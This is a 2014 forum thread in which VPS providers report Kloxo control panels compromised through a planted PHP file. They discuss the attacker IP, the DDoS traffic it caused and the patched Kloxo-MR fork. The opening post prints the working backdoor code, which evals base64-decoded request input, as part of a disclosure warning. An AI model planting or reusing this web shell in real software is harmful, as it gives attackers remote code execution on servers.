Kloxo installations compromised

Damian Member
edited January 2014 in General

We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):

```php
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\">Access denied.';}
?>
```

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via the variable. This is obviously bad.

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's affected Ramnode, if not others. Beware!

Thanked by 3vedran Janevski Mark_R

Comments

  • We just got done suspending a good 15 or so VPS for this issue. Killed CPU on nodes; the network was acting up because of how many there were, but it was on average 30-45k pps per VPS.

  • boernd Member
    edited January 2014

    @Damian said:

    All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

    It seems this server is still online.
    You should send a mail to [email protected] with logs attached.

  • vRozenSch00n Member
    edited January 2014

    My test VPS was also compromised with the same issue, and I found out from the log that they brute forced the control panel login.

    Edit: the log shows that it comes from IP 178.248.23.39

  • How is VestaCP? Is it more secure than Kloxo?

  • zhuanyi said: How is VestaCP? Is it more secure than Kloxo?

    So far, no problem with VestaCP.

    AFAIK the vulnerability is an old issue that until now has not been settled:

    http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646&#msg_102646

  • jar Patron Provider, Top Host, Veteran

    Affecting kloxo-mr as well?

  • @jarland said:
    Affecting kloxo-mr as well?

    Considering the developer of Kloxo-MR posted the patch/fix on the lx forums years ago, I'm sure it'd be fine.

    Thanked by 2Spirit jar
  • vRozenSch00n Member
    edited January 2014

    jarland said: Affecting kloxo-mr as well?

    No. Kloxo-MR is a fork that has security in mind.

    Emergency solution for a personal installation: add htpasswd to lighttpd, or change the file as presented in the old lxcenter forum above, or better, ask @mustafaramadhan.

    Thanked by 1jar
  • Got a nice email from BuyVM about this... What was so appealing about Kloxo anyway? A command line seems to be all a reasonably intelligent person would need...

  • Seems like an odd piece of software to 'target', I hadn't heard of it until now.

  • @ricardo said:
    Seems like an odd piece of software to 'target', I hadn't heard of it until now.

    On the contrary, it's a rather popular template for VPS providers, or at least it used to be.

  • Got a nice email from WeLoveServers as well about this issue

  • Oh crap!

  • @ricardo said:
    Seems like an odd piece of software to 'target', I hadn't heard of it until now.

    Tell that to the 29% of computer owners still running Windows XP.

  • These are the patches/fixes in Kloxo-MR related to security issues (mostly from Kloxo official):

    • fix possible SQL injection on login and API
    • fix switch between 'safe' and 'unsafe' mode
    • disable/remove '/usr/bin/lxsuexec' and '/usr/sbin/lxrestart'
    • update suphp config (possible security issue)
    • fix lxguard to detect ftp logins
    • change lxphp+lxlighttpd to php52s+hiawatha
    • fix security bug for php-fpm (add open_basedir)
    Thanked by 1mpkossen
  • I had Kloxo-MR installed on my INIZ VPS. They emailed me to remove Kloxo or be suspended. I complied and appreciated the warning, but not the heavy-handed threat, even though I was running the MR fork without the vulnerability.

  • @cpaquette said:
    I had Kloxo-MR installed on my INIZ VPS. They emailed me to remove Kloxo or be suspended. I complied and appreciated the warning, but not the heavy-handed threat, even though I was running the MR fork without the vulnerability.

    Send the information from http://pastie.org/pastes/8677127 to your provider. Also, better information comes from 'sh /script/sysinfo'.

  • Why would people use kloxo anyway?

  • The question is how they (providers) know where we are using Kloxo. Because of scanning ports?

    So, what happens if we change the Kloxo/Kloxo-MR access port (from 7777/7778 to 8777/87778 or others)?

  • joepie91 Member, Patron Provider

    @mustafaramadhan said:
    The question is how they (providers) know where we are using Kloxo. Because of scanning ports?

    So, what happens if we change the Kloxo/Kloxo-MR access port (from 7777/7778 to 8777/87778 or others)?

    I presume that Kloxo is mostly used as an OpenVZ template. OpenVZ lets a provider access the VPS filesystem, so they could just identify a file that is unique to Kloxo, and they'd be able to tell that a certain VPS is running Kloxo (without actually looking at any file contents).

    Thanked by 1mustafaramadhan
  • Why install a cp on a lowendbox?

  • I would bet cvps would be last to act on this.

  • Kloxo used to be very good, until the updates stopped and the bugs piled up. The community was active before, but it never really got the traction that other cp's from its generation gained.

  • kyaky Member
    edited January 2014

    @zhuanyi said:
    How is VestaCP? Is it more secure than Kloxo?

    I've been using VestaCP for production for weeks. Not a single problem yet. Very good, especially with their tons of CLI commands: you can do more than what the interface provides, more functions than their GUI. When you type "v-" and press [TAB], 260+ commands show up.

    Thanked by 2vRozenSch00n zhuanyi
  • kyaky Member
    edited January 2014

    Did anyone say the author of Kloxo committed suicide, or something? Can't remember.

  • @Spirit said:

    Holy ****. That's terrible.

  • linuxglobe Member
    edited January 2014

    I use Kloxo-MR on my few VPSs, and I never had any problem. It is stable and secure, not like the Kloxo official version. Thanks to Mustafa!

  • I use Webuzo free version and it's really good so far. If you don't need clients (sub-accounts) I suggest you use it as well.

  • Kind of glad I migrated away from Kloxo to VestaCP.

    Also, I've seen a few people asking why people install panels, especially on LE* VPS. Personally, I use panels because I like a GUI better than the command line. It's simpler and a lot faster than remembering lines and lines of commands. Plus, it's more user friendly, especially if you are hosting friends'/family's/etc.'s websites.

    Side note: on one of my 512 MB VPS, I'm running VestaCP with 12 websites and I'm only using ~84 MB of RAM (or ~16%).
